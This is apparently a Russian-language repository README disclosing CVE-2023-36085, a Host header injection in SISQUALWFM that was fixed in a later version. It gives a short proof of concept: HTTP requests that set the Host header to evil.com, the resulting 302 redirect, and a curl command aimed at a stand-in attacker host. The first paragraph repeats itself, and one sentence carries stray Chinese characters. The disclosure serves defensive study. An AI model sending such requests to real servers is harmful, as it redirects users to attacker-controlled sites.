
Этот репозиторий содержит информацию, связанную с CVE-2023-36085, уязвимостью внедрения заголовка хоста (Host Header Injection), обнаруженной в SISQUALWFM версии 7.1.319.103, которая позволяет злоумышленнику манипулировать ссылками на веб-страницах или перенаправлять пользователей на вредоносный сайт. Этой уязвимости был присвоен идентификатор CVE-2023-36085, и она была исправлена в версии 7.1.319.111 и выше.
Этот репозиторий содержит информацию об уязвимости внедрения заголовка Host, обнаруженной в SISQUALWFM версии 7.1.319.103, которая позволяет злоумышленнику манипулировать ссылками на веб-странице или перенаправлять пользователей на вредоносный сайт. Этой уязвимости присвоен идентификатор CVE-2023-36085, и она исправлена в версии 7.1.319.111 и выше.
Мы приводим сценарий доказательства концепции, демонстрирующий уязвимость внедрения заголовка Host, с целевым конечным点在 /sisqualIdentityServer/core. Эта уязвимость позволяет злоумышленнику манипулировать ссылками на веб-странице или перенаправлять пользователей на другой сайт путём изменения заголовка Host.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Чтобы воспользоваться этой уязвимостью, злоумышленник может использовать следующую команду curl для изменения заголовка Host:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
Этот репозиторий предназначен только для информационных целей и не должен использоваться для каких-либо вредоносных действий. Уязвимость была ответственно раскрыта вендору, и проблема устранена. Крайне важно следовать этическим принципам взлома и соблюдать практики ответственного раскрытия при выявлении и сообщении об уязвимостях.